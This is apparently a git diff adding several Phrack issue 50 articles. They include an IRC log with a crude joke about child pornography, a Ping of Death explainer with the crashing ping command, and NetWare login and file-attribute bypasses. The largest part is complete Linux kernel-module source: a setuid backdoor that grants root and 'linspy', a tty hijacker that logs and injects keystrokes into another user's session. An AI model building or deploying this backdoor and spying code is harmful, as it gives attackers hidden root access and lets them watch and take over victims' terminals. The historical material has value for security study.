+<w0zz> werd
+<d9> w0zz, what do you think?
+<W|ZaRD> new group name
+<_e|f_> d9: ops plz
+<d9> r00t?  guild?
+<d9> wait
+<_e|f_> this is only a temp channel neway d9
+<W|ZaRD> guild wuz already used
+<d9> those are taken...
+<_e|f_> so its a waste to do a takeover
+<w0zz> i like r00t
+<w0zz> oh
+<w0zz> yeah
+<w0zz> those guys are eleet
+<d9> yah
+<d9> I hear r00t has this 10 year old that can break into .mil sites...
+*** d9 is now known as daemon9
+<w0zz> duod, he's like D.A.R.Y.L.
+<W|ZaRD> hehe
+<daemon9> yah..
+<_e|f_> d9: i take it by this yew aint interested?
+<_e|f_> :\
+<daemon9> anyway, bak to pr0n.
+<W|ZaRD> anywayz.. op me d00d
+<w0zz> me too
+<w0zz> must have m0re pr0n
+*** Mode change "+m" on channel #supreme by daemon9
+<daemon9> yes
+*** w0zz has left channel #supreme
+<daemon9> more pr0n
+<w0zz:#!r00t> werd
+<w0zz:#!r00t> that rooled
+<daemon9> mega-pr0n
+<W|ZaRD> porn
+<W|ZaRD> hehe
+<daemon9> kiddie-pr0n 
+<W|ZaRD> op me plz
+<daemon9> wizard, you are fine the way you are.
+*** w0zz is now known as [w0zzz]
+*** daemon9 has left channel #supreme
+*** daemon9 is now known as r0ute
+<r0ute> hahaha
+<[w0zzz]> heh
+<r0ute> that was fun.
+<r0ute> good way to wake up from a nap
+
+
+
+                                ----<>----
+
+
+
+			Large Packet Attacks
+			(AKA Ping of Death)
+		   ---------------------------------
+
+
+	[ Introduction ]
+
+	Recently, the Internet has seen a large surge in denial of service
+attacks.  A denial of service attack in this case is simply an action of some 
+kind that prevents the normal functionality of the network.  It denies service.
+This trend began a few months back with TCP SYN flooding and continues with the
+"large packet attack".  In comparison with SYN flooding, the large packet attack 
+is a much more simple attack in both concept (explained below) and execution 
+(the attack can be carried out by anyone with access to a Windows 95 machine).  
+TCP SYN flooding is more complex in nature and does not exploit a flaw so much 
+as it exploits an implementation weakness.  
+	The large packet attack is also much more devastating then TCP SYN 
+flooding.  It can quite simply cause a machine to crash, whereas SYN flooding 
+may just deny access to mail or web services of a machine for the duration of 
+the attack.  For more information on TCP SYN flooding see Phrack 49, article 13.
+(NOTE:  The large packet attack is somewhat misleadingly referred to as 'Ping of 
+Death` because it is often delivered as a ping packet.  Ping is a program that 
+is used to test a machine for reachablity to see if it alive and accepting 
+network requests.  Ping also happens to be a convenient way of sending the 
+large packet over to the target.)
+	The large packet attack has caused no end of problems to countless 
+machines across the Internet.  Since its discovery, *dozens* of operating 
+system kernels have been found vulnerable, along with many routers, terminal 
+servers, X-terminals, printers, etc.  Anything with a TCP/IP stack is in fact,
+potentially vulnerable.  The effects of the attack range from mild to 
+devastating.  Some vulnerable machines will hang for a relatively short period
+time then recover, some hang indefinitely, others dump core (writing a huge 
+file of current memory contents, often followed by a crash), some lose 
+all network connectivity, many rebooted or simply gave up the ghost.
+	
+	[ Relevant IP Basics ]	
+
+	Contrary to popular belief, the problem has nothing to do with the
+`ping` program.  The problem lies in the IP module.  More specifically,
+the problem lies the in the fragmentation/reassembly portion of the IP module.
+This is portion of the IP protocol where the packets are broken into smaller 
+pieces for transit, and also where they are reassembled for processing.  An IP
+packet has a maximum size constrained by a 16-bit header field (a header is a 
+portion of a packet that contains information about the packet, including
+where it came from and where it is going).  The maximum size of an IP packet 
+is 65,535 (2^16-1) bytes.  The IP header itself is usually 20 bytes so this 
+leaves us with 65,515 bytes to stuff our data into.  The underlying link layer
+(the link layer is the network logically under IP, often ethernet) can seldom 
+handle packets this large (ethernet for example, can only handle packets up to 
+1500 bytes in size).  So, in order for the link layer to be able to digest a 
+large packet, the IP module must fragment (break down into smaller pieces) 
+each packet it sends to down to the link layer for transmission on the network.
+Each individual fragment is a portion of the original packet, with its own 
+header containing information on exactly how the receiving end should put it 
+back together.  This putting the individual packets back together is called 
+reassembly.  When the receiving end has all of the fragments, it reassembles 
+them into the original IP packet, and then processes it.
+
+	[ The attack ]
+
+	The large packet attack is quite simple in concept.  A malicious user  
+constructs a large packet and sends it off.  If the destination host is
+vulnerable, something bad happens (see above).  The problem lies in the
+reassembly of these large packets.  Recall that we have 65,515 bytes of space 
+in which to stuff data into.  As it happens, a few misbehaved applications
+(and some specially crafted evil ones) will allow one to place slightly more 
+data into the payload (say 65,520 bytes).  This, along with a 20 byte IP
+header, violates the maximum packet size of 65,535 bytes.  The IP module will 
+then simply break this oversized packet into fragments and eschew them to 
+their intended destination (target).  The receiving host will queue all of the 
+fragments until the last one arrives, then begin the process of reassembly.  
+The problem will surface when the IP module finds that the packet is in
+fact larger than the maximum allowable size as an internal buffer is 
+overflowed.  This is where something bad happens (see above).
+	
+	[ Vulnerability Testing and Patching ]
+
+	Testing to see if a network device is vulnerable is quite easy. 
+Windows NT and Windows 95 will allow construction of these oversized
+packets without complaining.  Simply type: `ping -l 65508 targethost`.  In
+this case, we are delivering an oversized IP packet inside of a ping packet, 
+which has a header size of 8 bytes.  If you add up the totals, 20 bytes of IP 
+header + 8 bytes of ping header + 65,508 bytes of data, you get a 65,536 byte 
+IP packet.  This is enough to cause affected systems to have problems.
+	Defense is preventative.  The only way to really be safe from this
+attack is to either ensure your system is patched, or unplug its network tap.
+There are patches available for just about every vulnerable system.  For
+a copious list of vulnerable systems and patches, check out a 'Ping of Death'
+webpage near you.
+
+			daemon9
+			Editor, Phrack Magazine
+			(daemon9@netcom.com)
+
+
+
+---------------------------------------------------------------------------
+
+To: route@onyx.infonexus.com
+From: xxxx xxxxxxxxxxx <xxxx@xxxxxxxxxx.com>
+Subject: Re: ?
+Status: RO
+
+Actually, hang on. I've looked your story up and down looking for ways to
+ make it more interesting and I can't. I think it's actually just too
+ technical for us and lacks a newsworthiness that was evident in the SYN
+ article. I mean, you never tell us why we should care about this, and
+ frankly, I don't know why we should. So, you're welcome to take another
+ pass at it, otherwise, I'll give you the kill fee of $100.
+
+xxxx
+
+[ Too techinical?  Any less techincal and I would have to make everything
+  rhyme so people wouldn't fall asleep. ]
+
+---------------------------------------------------------------------------
+
+
+                                ----<>----
+
+
+                       Netware Insecurities
+                              Tonto
+ 
+                            [the rant]
+        
+        I realize that to most security professionals and
+        system administrators who will see this magazine,
+        the term "NetWare security" is a punchline.  That
+        unfortunately does not change the fact that many 
+        people in the field, myself included, must deal
+        with it daily.  Really, honestly, I do agree with
+        you.  Please don't write me to tell me about how
+        futile it is.  I already know.
+ 
+        Since its release, not much security news has really 
+        surfaced surrounding Novell NetWare 4.  A lot of the 
+        security flaws that were present in 3.1x were 'fixed'
+        in 4.x since Novell pretty much redesigned the way
+        the user/resource database worked, was referenced, 
+        and stored.  Some flaws remained, although fixes for
+        them are well-known, and easily applied.  However,
+        NetWare 4 came with its own batch of new security
+        flaws, and Novell has done a poor job of addressing
+        them, hoping that consumer-end ignorance and the
+        client/server software's proprietary design will hide 
+        these holes.  You'd figure they would know better by 
+        now.  
+        
+        The ability to use a packet sniffer to snag RCONSOLE
+        passwords still exists;  NetWare 4 institutes client-end
+        authentication to implement its auto-reconnect feature;
+        the list goes on.  Below are just a couple of examples
+        of such bugs and how to deal with them.  As new Novell
+        products bring many existing LANs out onto the Internet,
+        I think you will see more of this sort of thing coming 
+        to the surface.  I hope that when it does, Novell decides 
+        to take a more responsible role in security support for
+        its products.  I'd hate for such a widely used product
+        to become the next HP/UX.
+ 
+ 
+                           [the exploits]
+ 
+[BUG #1]
+ 
+This bug is known to affect NetWare 4.10.  It's probably present in 4.01 
+and other versions that support Directory Services, but I haven't 
+verified this.  I'm only a CNA, so I tried to verify this bug by talking 
+to a group of CNEs and nobody had heard of this, although there are 
+apparently other bugs in previous versions of LOGIN.EXE.  
+ 
+The bug is a combination of some weak code in LOGIN-4.12 
+(SYS:\LOGIN\LOGIN.EXE) and a default User object in NDS - the user template 
+USER_TEMPLATE. LOGIN allows input fields to be passed directly, instead 
+of filtered, if they are passed to LOGIN correctly -- by specifying an 
+object's context explicitly (as opposed to implicitly by using CX) and 
+putting the User object's name in quotes.
+ 
+F:\PUBLIC>LOGIN SVR1/"USER_TEMPLATE"
+ 
+For Server object SVR1 in an appropriate context, this would probably work
+and give a generic level of user access, perhaps to other volumes, 
+programs, etc.  That will vary depending on the setup of the server.
+ 
+The fix is simple.  Load SYS:\PUBLIC\NWADMIN.EXE and disable the user 
+template's login.  But from now on, you will have to manually enable
+login for any new User objects created in your tree.
+ 
+ 
+[BUG #2]
+ 
+This isn't a bug as much as a failed attempt to add security to a DOS file
+system.  But since Novell touts (and teaches) it as a file system security
+tool, it is worth addressing.
+ 
+NetWare comes with a tool called FLAG, which is supposed to be the NetWare
+equivalent of UNIX's chmod(), in that it controls file attributes for files
+on local and NetWare file systems.  The problem lies in that Novell  
+thought it would be neat to incorporate its tool into the world of DOS file 
+attributes as well.  So they made FLAG alter DOS file attributes 
+automatically to correspond with the new attributes installed by FLAG.  
+This would've been cool, except that DOS's ATTRIB.EXE can also be used to 
+change the DOS-supported file attributes set by FLAG.  (Archive, Read-only, 
+ Hidden, and System, respectively)  And since ATTRIB doesn't reference NDS 
+in any way, the problem is obvious;  A file that was marked Read-only by 
+its owner, using FLAG, could be compromised by a user other than its owner,
+with ATTRIB, and then altered or deleted.
+ 
+There isn't an easy fix for something that is this broken, so it is 
+simply recommended that you use IRFs (carefully) to designate file rights 
+on your server.
+ 
+ 
+[ 01-07-97 - Tont0 ]
+
+
+                                ----<>----
+EOF
+              
diff --git a/phrack50/4.txt b/phrack50/4.txt
new file mode 100644
index 0000000..4776743
--- /dev/null
+++ b/phrack50/4.txt
@@ -0,0 +1,162 @@
+                                .oO Phrack 50 Oo.
+
+                            Volume Seven, Issue Fifty
+
+                                     4 of 16
+
+  
+                             -:[ Phrack Pro-Phile ]:-
+
+                                    Aleph One
+                                    ~~~~~~~~~
+
+    Personal
+    ~~~~~~~~
+ 
+             Handle: Aleph One
+           Call him: Aleph
+       Past handles: None
+      Handle origin: Transfinite Math
+                     ("Infinity and the Mind" by Rudy Rucker)
+      Date of Birth: 1974
+             Height: 6 feet
+             Weight: No idea.
+          Eye color: Olive
+         Hair Color: Dark Brown
+          Computers: Two
+           Admin of: Underground.Org, and BugTraq
+   Sites Frequented: None.  I got better things to do with my time.
+               URLs: http://www.disinfo.com/
+ 
+
+    Favorite Things
+    ~~~~~~~~~~~~~~~
+             Women: Intelligent, sexy with beautiful eyes and class.
+              Cars: None.  They are a pain.  Ride a motorcycle.
+             Foods: Exotic.  Sushi (Anago), Arab, Chinese, Vietnamese,
+                    Thai, Indian, Ethiopian.  Seafood.  Meat.  Anything on 
+                    a grill.  Anything flamb. Wine: Chianti.
+             Music:      Techno: Leftfield, Orbital, Underworld, Electric 
+                                 Skychurch, Prodigy, Juno Reacto, 
+                                 Chemical Brothers, Ambient, GOA Trace.
+                           Rock: Tool, Marylin Mason, Beck, Garbage, NIN.
+                      Classical: Bach, Baroque
+                    Soundtracks: Natural Born Killers, The Piano, Braveheart, 
+                                 RobRoy.
+             Books: "Godel, Escher, Bach" by Douglas R. Hofstadter
+                    "Infinity and the Mind" by Rudy Rucker
+                    "100 Years of Solitude" (in Spanish)
+                      by Gabriel Garcia Marques
+                    "Metamorphosis" by Kafka
+          Turn Ons: Intelligence.  Class.  Pierced belly buttons.
+                    Tasteful tattoos.  Long hair.
+         Turn Offs: Ignorance.  Attitude.  Bad tattoos. 
+
+
+
+    Other passions, interests, loves:
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+    Painting - Went to a painting/drawing class for 3 years.  Did
+    everything from pencil, pastels, up to watercolors.  I stopped going
+    when I started working with oils.  I haven't painted in almost 7 years.
+    Too bad, I enjoyed it.
+
+    Math - For some reason I always liked math.  I hated doing exercises,
+    but always liked the theory.  Guess that's why my grades were not
+    better.  I was intending to do a minor in math but I quit school
+    before that ever happened...
+
+    Reading - One of the things I value the most are my books.  I really enjoy
+    reading.  Sadly, lately, all I read are technical books.  I need to
+    start reading other stuff again.
+
+    AI - When I started fooling around with computers I wanted to go into AI,
+    but the lack of material at my disposition at the time kept me from
+    delving into it too much.
+
+    Most memorable experiences:
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+    Death - It marks your life for ever.
+
+    Burning Man '95 - One of the most intense experiences of my life.
+    Nothing can compare to the creation and expression of this community 
+    that grows and dies in one of the most inhospitable, yet more 
+    beautiful, places on earth.
+
+    Some people to mention:
+    ~~~~~~~~~~~~~~~~~~~~~~~   
+
+    Annaliza (for all the rides from work, all the adventures, always being 
+              there, and the hot cocoa)
+
+    Luis (for all the good times, the bad times, and begin one fucking
+          crazy Spanish cosaco)
+
+    Mr. Upsetter, Buckaroo Banzai, Dan, Rod & Rika, Sir Dystic, Freqout, 
+    White Knight & Loren (for being good friends)
+
+    Intrepid Traveller (for giving me the number to Lunatic Labs)
+
+    Noid, Pappy, Phax, Elvis Smurf, Ming of Mongo, TRW, Clockwork, and the 
+    rest of the old LA 2600 crew (for being themselves)
+
+    Veggie (for being larger than life)
+
+    Mycroft (who would have thought?)
+
+    r00t (for being elite)
+
+    A few things you would like to say:
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+    Knowledge come from within.
+
+   The New Security Threat: Disinformation
+
+   Statistics show that network break-ins are on the rise.  Entities
+connecting to the Net expect to be broken into.  They know it's only
+a matter of time before some random hacker targets their machines using
+the latest warez to bypass their firewall and break into their machine.
+They have seen it happen over and over.  The CIA, DOJ, NASA, MGM/UA, etc.
+
+   The modus operandi is always the same: Deface the web page, or trash the
+machines.  For this occurrence they have prepared.  Backups are in place, and
+ready to be used.  Hacked web pages hardly stay up more than half and hour
+before they are taken down.  What ever message the hackers wanted to deliver
+was probably only seen by a handful of people.  There no longer is any
+incentive to hack a web site that no one will see.
+
+   So what is next?  Disinformation.
+
+   The Internet as a medium facilitates the free flow of information.  Single
+individuals can reach large, as yet before unreachable audiences. Information 
+that before would have been relegated to some obscure corner, now travels at
+the speed of light and is disseminated all over the world.  Everyday the Net
+is becoming a more important source of leads and information for the standard
+news media.  It usually only takes a few hours before some information such
+as a new product, or some new bug, published on the Net appears on TV or
+some newspaper's web site.  And as more companies publish information online
+our dependence on the Net as a source of information will only increase.
+
+   But the medium does not attempt to validate or even authenticate this
+information in most cases.  A anonymous tip on some newsgroup or web site
+can cause a company a lot of headaches.  Even the worst are half-truths. 
+Just look at the damage control that corporations such as Microsoft and Intel
+had to do in the past.  But this is only the beginning.
+
+   What if that motivated hacker decides that instead of replacing the
+company's web site with some obscene language and graphics that will be
+taken down almost immediately we will add a small officially worded press
+release to the web site.  How long until someone notices?  How long until
+they realize it's a fake.  Maybe we should also email the press release to
+some media contacts.  What are the chances that it will be catch before it
+makes it into the news?  Or that it will catch before it's discussed on some
+newsgroup with a large audience?
+
+   The amount of damage control a well placed piece of information coming
+from a seemingly reputable source is incredible.  This, I believe, is where
+future attacks lay.
+
+EOF
diff --git a/phrack50/5.txt b/phrack50/5.txt
new file mode 100644
index 0000000..a0fc859
--- /dev/null
+++ b/phrack50/5.txt
@@ -0,0 +1,538 @@
+                                .oO Phrack 50 Oo.
+
+                            Volume Seven, Issue Fifty
+
+                                     5 of 16
+ 
+                   ============================================
+                   Abuse of the Linux Kernel for Fun and Profit
+                              halflife@infonexus.com 
+			       [guild  corporation]
+                   ============================================
+
+Introduction
+------------
+   Loadable modules are a very useful feature in linux, as they let
+you load device drivers on a as-needed basis.  However, there is
+a bad side: they make kernel hacking almost TOO easy.  What happens
+when you can no longer trust your own kernel...?  This article describes
+a simple way kernel modules can be easily abused. 
+
+System calls
+------------
+   System calls. These are the lowest level of functions available, and
+are implemented within the kernel. In this article, we will discuss how
+they can be abused to let us write a very simplistic tty hijacker/monitor.
+All code was written and designed for linux machines, and will not compile
+on anything else, since we are mucking with the kernel.
+
+    TTY Hijackers, such as tap and ttywatcher are common on Solaris,
+SunOS, and other systems with STREAMS, but Linux thus far has not had
+a useful tty hijacker (note: I don't consider pty based code such as
+telnetsnoop to be a hijacker, nor very useful since you must make
+preparations ahead of time to monitor users).
+
+   Since linux currently lacks STREAMS (LinSTREAMS appears to be dead),
+we must come up with a alternative way to monitor the stream.  Stuffing
+keystrokes is not a problem, since we can use the TIOCSTI ioctl to stuff
+keystrokes into the input stream.  The solution, of course, is to redirect
+the write(2) system call to our own code which logs the contents of the
+write if it is directed at our tty;  we can then call the real write(2)
+system call.
+
+   Clearly, a device driver is going to be the best way to do things.  We
+can read from the device to get the data that has been logged, and add
+a ioctl or two in order to tell our code exactly what tty we want to log.
+
+
+Redirection of system calls
+---------------------------
+   System calls are pretty easy to redirect to our own code.  It works in
+principle like DOS terminate and stay resident code.  We save the old
+address in a variable, then set a new one pointing to our code.  In our
+code, we do our thing, and then call the original code when finished.
+
+   A very simple example of this is contained in hacked_setuid.c, which
+is a simple loadable module that you can insmod, and once it is inserted
+into the kernel, a setuid(4755) will set your uid/euid/gid/egid to 0.
+(See the appended file for all the code.)  The addresses for the
+syscalls are contained in the sys_call_table array.  It is relatively easy
+to redirect syscalls to point to our code.  Once we have done this, many
+things are possible...
+
+Linspy notes
+------------
+   This module is VERY easy to spot, all you have to do is cat /proc/modules 
+and it shows up as plain as day.  Things can be done to fix this, but I
+have no intention on doing them.
+
+   To use linspy, you need to create an ltap device, the major should
+be 40 and the minor should be 0.  After you do that, run make and then
+insmod the linspy device.  Once it is inserted, you can run ltread [tty]
+and if all goes well, you should see stuff that is output to the user's
+screen.  If all does not go well ... well, I shall leave that to your
+nightmares.
+
+The Code [use the included extract.c utility to unarchive the code]
+---------------------------------------------------------------------
+
+
+<++> linspy/Makefile
+CONFIG_KERNELD=-DCONFIG_KERNELD
+CFLAGS = -m486 -O6 -pipe -fomit-frame-pointer -Wall $(CONFIG_KERNELD)
+CC=gcc
+# this is the name of the device you have (or will) made with mknod
+DN = '-DDEVICE_NAME="/dev/ltap"'
+# 1.2.x need this to compile, comment out on 1.3+ kernels
+V = #-DNEED_VERSION
+MODCFLAGS := $(V) $(CFLAGS) -DMODULE -D__KERNEL__ -DLINUX
+
+all:		linspy ltread setuid
+
+linspy:		linspy.c /usr/include/linux/version.h
+		$(CC) $(MODCFLAGS) -c linspy.c
+
+ltread:		
+		$(CC) $(DN) -o ltread ltread.c
+
+clean:		
+		rm *.o ltread
+
+setuid:		hacked_setuid.c /usr/include/linux/version.h
+		$(CC) $(MODCFLAGS) -c hacked_setuid.c
+                                                     
+<--> end Makefile
+<++> linspy/hacked_setuid.c
+int errno;
+#include <linux/sched.h>
+#include <linux/mm.h>
+#include <linux/malloc.h>
+#include <linux/errno.h>
+#include <linux/sched.h>
+#include <linux/kernel.h>
+#include <linux/times.h>
+#include <linux/utsname.h>
+#include <linux/param.h>
+#include <linux/resource.h>
+#include <linux/signal.h>
+#include <linux/string.h>
+#include <linux/ptrace.h>
+#include <linux/stat.h>
+#include <linux/mman.h>
+#include <linux/mm.h>
+#include <asm/segment.h>
+#include <asm/io.h>
+#include <linux/module.h>
+#include <linux/version.h>
+#include <errno.h>
+#include <linux/unistd.h>
+#include <string.h>
+#include <asm/string.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <sys/sysmacros.h>
+#ifdef NEED_VERSION
+static char kernel_version[] = UTS_RELEASE;
+#endif
+static inline _syscall1(int, setuid, uid_t, uid);
+extern void *sys_call_table[];
+void *original_setuid;
+extern int hacked_setuid(uid_t uid)
+{
+   int i;                     
+   if(uid == 4755)
+   {
+      current->uid = current->euid = current->gid = current->egid = 0;
+      return 0;
+   }
+   sys_call_table[SYS_setuid] = original_setuid;
+   i = setuid(uid);
+   sys_call_table[SYS_setuid] = hacked_setuid;
+   if(i == -1) return -errno;
+   else return i;
+}
+int init_module(void)
+{
+   original_setuid = sys_call_table[SYS_setuid];
+   sys_call_table[SYS_setuid] = hacked_setuid;
+   return 0;
+}
+void cleanup_module(void)
+{
+   sys_call_table[SYS_setuid] = original_setuid;
+}  
+<++> linspy/linspy.c
+int errno;
+#include <linux/tty.h>
+#include <linux/sched.h>
+#include <linux/mm.h>
+#include <linux/malloc.h>
+#include <linux/errno.h>
+#include <linux/sched.h>
+#include <linux/kernel.h>
+#include <linux/times.h>
+#include <linux/utsname.h>
+#include <linux/param.h>
+#include <linux/resource.h>
+#include <linux/signal.h>
+#include <linux/string.h>
+#include <linux/ptrace.h>
+#include <linux/stat.h>
+#include <linux/mman.h>
+#include <linux/mm.h>
+#include <asm/segment.h>
+#include <asm/io.h>
+#ifdef MODULE
+#include <linux/module.h>       
+#include <linux/version.h>
+#endif
+#include <errno.h>
+#include <asm/segment.h>
+#include <linux/unistd.h>
+#include <string.h>
+#include <asm/string.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <sys/sysmacros.h>
+#include <linux/vt.h>
+
+/* set the version information, if needed */
+#ifdef NEED_VERSION
+static char kernel_version[] = UTS_RELEASE;
+#endif
+
+#ifndef MIN
+#define MIN(a,b)        ((a) < (b) ? (a) : (b))
+#endif
+
+/* ring buffer info */        
+
+#define BUFFERSZ        2048
+char buffer[BUFFERSZ];
+int queue_head = 0;
+int queue_tail = 0;
+
+/* taken_over indicates if the victim can see any output */
+int taken_over = 0;
+
+static inline _syscall3(int, write, int, fd, char *, buf, size_t, count);
+extern void *sys_call_table[];
+
+/* device info for the linspy device, and the device we are watching */
+static int linspy_major = 40;
+int tty_minor = -1;
+int tty_major = 4;
+
+/* address of original write(2) syscall */
+void *original_write;
+
+void save_write(char *, size_t);
+
+
+int out_queue(void) 
+{
+   int c;
+   if(queue_head == queue_tail) return -1;
+   c = buffer[queue_head];
+   queue_head++;
+   if(queue_head == BUFFERSZ) queue_head=0;
+   return c;
+}
+
+int in_queue(int ch)
+{
+   if((queue_tail + 1) == queue_head) return 0;
+   buffer[queue_tail] = ch;
+   queue_tail++;
+   if(queue_tail == BUFFERSZ) queue_tail=0;
+   return 1;
+}
+
+
+/* check if it is the tty we are looking for */
+int is_fd_tty(int fd)
+{
+   struct file *f=NULL;
+   struct inode *inode=NULL;
+   int mymajor=0;
+   int myminor=0;
+
+   if(fd >= NR_OPEN || !(f=current->files->fd[fd]) || !(inode=f->f_inode))
+      return 0;
+   mymajor = major(inode->i_rdev);
+   myminor = minor(inode->i_rdev);
+   if(mymajor != tty_major) return 0;
+   if(myminor != tty_minor) return 0;
+   return 1;
+}
+
+/* this is the new write(2) replacement call */
+extern int new_write(int fd, char *buf, size_t count)
+{
+   int r;
+   if(is_fd_tty(fd))
+   {
+      if(count > 0)
+         save_write(buf, count);
+      if(taken_over) return count;
+   }
+   sys_call_table[SYS_write] = original_write;
+   r = write(fd, buf, count); 
+   sys_call_table[SYS_write] = new_write;
+   if(r == -1) return -errno;
+   else return r;
+}
+
+
+/* save data from the write(2) call into the buffer */
+void save_write(char *buf, size_t count)
+{
+   int i;
+   for(i=0;i < count;i++)
+      in_queue(get_fs_byte(buf+i));
+}
+
+/* read from the ltap device - return data from queue */
+static int linspy_read(struct inode *in, struct file *fi, char *buf, int count)
+{
+   int i;
+   int c;
+   int cnt=0;
+   if(current->euid != 0) return 0;
+   for(i=0;i < count;i++)
+   {
+      c = out_queue();
+      if(c < 0) break;
+      cnt++;
+      put_fs_byte(c, buf+i);
+   }
+   return cnt;
+}
+
+/* open the ltap device */
+static int linspy_open(struct inode *in, struct file *fi)
+{
+   if(current->euid != 0) return -EIO;
+   MOD_INC_USE_COUNT;
+   return 0;
+}
+
+/* close the ltap device */
+static void linspy_close(struct inode *in, struct file *fi)
+{
+   taken_over=0;
+   tty_minor = -1;
+   MOD_DEC_USE_COUNT;
+}
+             
+/* some ioctl operations */
+static int
+linspy_ioctl(struct inode *in, struct file *fi, unsigned int cmd, unsigned long args)
+{
+#define LS_SETMAJOR     0
+#define LS_SETMINOR     1
+#define LS_FLUSHBUF     2
+#define LS_TOGGLE       3
+
+   if(current->euid != 0) return -EIO;
+   switch(cmd)
+   {
+      case LS_SETMAJOR:
+         tty_major = args;
+         queue_head = 0;
+         queue_tail = 0;
+         break;
+      case LS_SETMINOR:
+         tty_minor = args;
+         queue_head = 0;
+         queue_tail = 0;
+         break;
+     case LS_FLUSHBUF:
+         queue_head=0;
+         queue_tail=0;
+         break;
+     case LS_TOGGLE:
+         if(taken_over) taken_over=0;
+         else taken_over=1;
+         break;
+      default:
+         return 1;
+   }
+   return 0;
+}
+
+
+static struct file_operations linspy = {
+NULL,
+linspy_read,
+NULL,
+NULL,
+NULL,
+linspy_ioctl,
+NULL, 
+linspy_open,
+linspy_close,
+NULL
+};
+
+
+/* init the loadable module */
+int init_module(void)
+{
+   original_write = sys_call_table[SYS_write];
+   sys_call_table[SYS_write] = new_write;
+   if(register_chrdev(linspy_major, "linspy", &linspy)) return -EIO;
+   return 0;
+}
+
+/* cleanup module before being removed */
+void cleanup_module(void)
+{
+   sys_call_table[SYS_write] = original_write;
+   unregister_chrdev(linspy_major, "linspy");
+}
+<--> end linspy.c
+<++> linspy/ltread.c
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <termios.h>
+#include <string.h>
+#include <fcntl.h>
+#include <signal.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <sys/sysmacros.h>
+
+struct termios save_termios;
+int ttysavefd = -1;
+int fd;
+
+#ifndef DEVICE_NAME
+#define DEVICE_NAME "/dev/ltap"
+#endif
+
+#define LS_SETMAJOR     0
+#define LS_SETMINOR     1
+ 
+#define LS_FLUSHBUF     2
+#define LS_TOGGLE       3
+
+void stuff_keystroke(int fd, char key)
+{
+   ioctl(fd, TIOCSTI, &key);
+}
+
+int tty_cbreak(int fd)
+{
+   struct termios buff;
+   if(tcgetattr(fd, &save_termios) < 0)
+      return -1;
+   buff = save_termios;
+   buff.c_lflag &= ~(ECHO | ICANON);
+   buff.c_cc[VMIN] = 0;
+   buff.c_cc[VTIME] = 0;
+   if(tcsetattr(fd, TCSAFLUSH, &buff) < 0)
+      return -1;
+   ttysavefd = fd;
+   return 0;
+}
+
+ char *get_device(char *basedevice)
+{
+   static char devname[1024];
+   int fd;
+
+   if(strlen(basedevice) > 128) return NULL;
+   if(basedevice[0] == '/')
+      strcpy(devname, basedevice);
+   else
+      sprintf(devname, "/dev/%s", basedevice);
+   fd = open(devname, O_RDONLY);
+   if(fd < 0) return NULL;
+   if(!isatty(fd)) return NULL;
+   close(fd);
+   return devname;
+}
+
+
+int do_ioctl(char *device)
+{
+   struct stat mystat;
+
+   if(stat(device, &mystat) < 0) return -1;
+    fd = open(DEVICE_NAME, O_RDONLY);
+   if(fd < 0) return -1;
+   if(ioctl(fd, LS_SETMAJOR, major(mystat.st_rdev)) < 0) return -1;
+   if(ioctl(fd, LS_SETMINOR, minor(mystat.st_rdev)) < 0) return -1;
+}
+
+
+void sigint_handler(int s)
+{
+   exit(s);
+}
+
+void cleanup_atexit(void)
+{
+   puts(" ");
+   if(ttysavefd >= 0)
+      tcsetattr(ttysavefd, TCSAFLUSH, &save_termios);
+}
+
+main(int argc, char **argv)
+{
+   int my_tty;
+   char *devname;
+    unsigned char ch;
+   int i;
+
+   if(argc != 2)
+   {
+      fprintf(stderr, "%s ttyname\n", argv[0]);
+      fprintf(stderr, "ttyname should NOT be your current tty!\n");
+      exit(0);
+   }
+   devname = get_device(argv[1]);
+   if(devname == NULL)
+   {
+      perror("get_device");
+      exit(0);
+   }
+   if(tty_cbreak(0) < 0)
+   {
+      perror("tty_cbreak");
+      exit(0);
+   }
+   atexit(cleanup_atexit);
+   signal(SIGINT, sigint_handler);
+   if(do_ioctl(devname) < 0)
+   {
+      perror("do_ioctl");
+      exit(0);
+   }
+   my_tty = open(devname, O_RDWR);
+   if(my_tty == -1) exit(0);
+   setvbuf(stdout, NULL, _IONBF, 0);
+   printf("[now monitoring session]\n");
+   while(1)
+   {
+      i = read(0, &ch, 1);
+      if(i > 0)
+      {
+         if(ch == 24)
+         {
+            ioctl(fd, LS_TOGGLE, 0);
+            printf("[Takeover mode toggled]\n");
+         }
+         else stuff_keystroke(my_tty, ch);
+      }
+      i = read(fd, &ch, 1);
+      if(i > 0)
+         putchar(ch);
+    }
+}
+<--> end ltread.c
+
+
+EOF
diff --git a/phrack50/6.txt b/phrack50/6.txt
new file mode 100644
index 0000000..6ffb1c4
--- /dev/null
+++ b/phrack50/6.txt
@@ -0,0 +1,4014 @@
+                                .oO Phrack 50 Oo.
+
+                            Volume Seven, Issue Fifty
+
+                                     6 of 16
+
+                               J U G G E R N A U T 
+ 
+                                  route|daemon9
+
+                      a guild corporation production 1996/7
+
+
+    Please use the included extract.c utility to extract the files and then
+    read the Install file.  Any problems/comments mail me route@infonexus.com.
+
+    A boot image is forthcoming that will allow a user to simply pop a disk
+    into most any networked PC and turn it into a Juggernaut workstation.
+
+<++> Juggernaut/ClothLikeGauze/.help
+
+                            Juggernaut 1.0 Help File
+
+|--------
+|Overview
+|--------
+
+Juggernaut is a robust network tool for the Linux OS.  It contains several
+modules offering a wide degree of functionality.  Juggernaut has been tested 
+successfully on several different Linux machines on several different networks. 
+However, your mileage may vary depending on the network topologies of the
+environment (ie: Smart hubbing will kill much of the packet sniffing 
+functionality...) and, to a lesser extent, the machine running Juggernaut.
+If something doesn't work, use a network debugger and figure out why...  
+
+Juggernaut v1.0 was originally published in Phrack Magazine, issue 50; on
+April 9, 1997.
+
+           Any serious problems/bugs or comments, please mail me: 
+        
+                           route@infonexus.com
+
+
+|---------------------
+|Command Line Options
+|---------------------
+
+    juggernaut -h       
+
+                        Quick help.
+
+    juggernaut -H       
+
+                        Dumps this help file.
+
+    juggernaut -v 
+
+                        By default, Juggernaut conveys error messages and other
+                        diagnostic information to the user.  Specifying this 
